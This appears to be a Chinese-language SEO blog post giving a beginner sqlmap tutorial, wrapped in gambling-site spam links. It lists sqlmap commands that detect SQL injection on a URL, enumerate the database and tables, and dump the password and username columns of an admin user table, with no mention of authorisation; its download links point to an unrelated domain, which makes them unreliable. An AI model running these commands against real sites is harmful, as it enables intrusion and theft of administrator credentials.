招财猫棋牌网址

黑桃棋牌下载-360棋牌 休闲斗地主2-qka棋牌中心-人气捕鱼游戏

老威SEO前段时间研究了一下sqlmap,其作为一款自动化的sql注入渗透工具,注入方式、注入成功后的取数据等等都是自动化的,非常适合我们这些小白前期玩玩渗透玩玩安全,它是用python写的,因此需要先安装python环境,一般都是傻瓜式安装操作

一、sqlmap的安装

1.python下载地址:

http://pamdoo.com

2.sqlmap下载地址:

http://pamdoo.com

把下载的sqlmap压缩包解压到文件夹sqlmap中,并将其复制粘贴到 “C:\Python27” 目录下(注:Python27为python安装文件夹)

在桌面新建一个cmd的快捷方式,将其命名为“SQLMap”,并键入对象位置为:cmd,快捷方式名称:SQLMap

双击刚才创建的快捷方式,输入sqlmap.py -h,出现如下信息则表示安装成功。 

sqlmap教程

二、sqlmap的常用命令

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193"  检测注入

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193" --current-user   获取当前用户  [email protected]

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193" --current-db 获取当前数据库 如为db_inis

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193" --tables -D db_inis

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193" -D db_inis --tables  获取当前数据库下所有表 如表为3

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user   获取表3下的所有字段 如字段为4,5,6

sqlmap.py -u "http://www.pamdoo.com/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump   注入完成

最后:此文章还待更新中……请持续关注


发布评论

分享到:

老威SEO

我的微信号:weiweiwei0725(左侧二维码扫一扫)欢迎添加!

[熊掌号运营]以后的SEO优化应该怎么做
你是第一个吃螃蟹的人
发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

黑桃棋牌下载-360棋牌 休闲斗地主2-qka棋牌中心-人气捕鱼游戏老威SEO博客-提供网站优化推广与网站建设服务招财猫棋牌网址